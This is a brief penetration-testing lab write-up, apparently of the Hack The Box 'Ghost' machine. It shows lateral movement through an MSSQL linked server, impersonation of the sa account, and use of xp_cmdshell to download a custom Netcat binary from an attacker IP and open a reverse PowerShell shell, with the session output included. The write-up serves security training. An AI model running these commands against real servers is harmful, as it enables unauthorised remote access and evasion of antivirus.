InfoSec LAB

Ghost_Lateral_Movement_mssqlserver

Created: 2 min read

mssqlserver

Initially, the target MSSQL instance didn’t appear to accept Kerberos authentication, and I was able to opt out to the NTLM authentication directly to the host. Upon gaining an access to the MSSQL instance, I discovered that there was a linked server. Namely, PRIMARY. Now, I also believed that PRIMARY was just a name of another MSSQL instance within the same host, but it turns out to be within another host, PRIMARY

I was able to switch over to the PRIMARY host, and automatically authenticated as the bridge_corp account within the PRIMARY MSSQL instance. Then, I leveraged the impersonation privilege to become the sa account

Now that the code execution via xp_cmdshell has been confirmed, I will attempt to establish a dedicated PowerShell session

SQL >[PRIMARY] (sa  dbo@master)> xp_cmdshell curl http://10.10.14.61/nc.exe -o %TEMP%\nc.exe
output                                                                             
--------------------------------------------------------------------------------   
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current    
 
                                 Dload  Upload   Total   Spent    Left  Speed      
 
100 28160  100 28160    0     0   278k      0 --:--:-- --:--:-- --:--:--  280k   
 
NULL

Transferring a custom Netcat binary to the %TEMP% directory of the PRIMARY host This is because the regular nc64.exe binary failed to execute due to the AV on the host

SQL >[PRIMARY] (sa  dbo@master)> xp_cmdshell %TEMP%\nc.exe 10.10.14.61 4444 -e powershell

Executing the custom Netcat binary for a reverse shell

┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [10.10.14.61] from (UNKNOWN) [10.10.11.24] 56817
 
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
 
PS C:\Windows\system32> 
PS C:\Windows\system32> whoami
nt service\mssqlserver
PS C:\Windows\system32> hostname
PRIMARY
PS C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.0.0.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.0.254

Initial Foothold established to the PRIMARY host as the nt service\mssqlserver account via Netcat

Interactive Graph View

Backlinks